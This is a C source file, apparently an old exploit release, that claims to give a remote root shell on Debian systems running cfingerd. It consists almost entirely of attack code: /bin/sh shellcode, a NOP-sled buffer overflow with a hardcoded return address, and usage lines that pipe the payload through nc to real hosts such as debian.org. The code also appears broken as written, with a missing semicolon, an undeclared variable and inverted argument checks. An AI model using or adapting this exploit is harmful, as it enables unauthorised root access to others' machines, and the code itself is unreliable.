/*
            - Imperfection Security Presents -     
         
       Debian GNU/Linux cfingerd remote root exploit
       From shakey, of Imperfection Security [07/99]
 
   Exploits a problem reported on BUGTRAQ in Debian's
   cfingerd. This exploit is remotely exploitable, and
   leaves the attacker a root shell on vulnerable systems.
   However, this attack is less susceptible to mass-probing
   from script kiddies due to the lack of a banner from the
   finger service ;D

   Affected Systems:
	+ Debian Linux 2.0r5, 2.0, 1.3.1, 1.3, 1.2

   Greetings: dave, unknown, syntax, naptime, jaz, blitzed
              t0m, insane, DSC, short, vicci, crime, SDI
              ( nice shellcode generator ), phewl,  
              phenom, punish, kindred, tom-, justin
              
   Usage:
     IS-finger [offset]
     Example:	(./IS-finger 0; cat) | nc linux.org 79
*/

#include <stdio.h>

char shellcode[] = 
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh"
 
main (int argc, char *argv[]) {
 char buf[2500];
 int x,y=1000, offset=0;
 long addr;
 int bsize=986;
 
 if ( argc > 1) {
  printf ( "Imperfection Securities\' cfingerd exploit.");
  printf ( "Usage: (./IS-finger [offset]; cat) | nc debian.org 79\n");
  exit (0);
 }
  
 if ( argc > 0) offset = atoi (argv[1]);

 addr = 0xbffff3c0 + offset; 
 
 bsize -= strlen ( host);
 
 for ( x = 0; x < bsize-strlen(shellcode); x++)
  buf[x] = 0x90;
 
 for ( y = 0; y < strlen(shellcode); x++, y++)
  buf[x] = shellcode[y]; 
 
 for ( ; x < 72; x+=4) { 
  buf[x  ] = addr & 0x000000ff;
  buf[x+1] = (addr & 0x0000ff00) >> 8;
  buf[x+2] = (addr & 0x00ff0000) >> 16;
  buf[x+3] = (addr & 0xff000000) >> 24;
 }
        
 sleep (1);
 printf ( "%s\r\n", buf);
}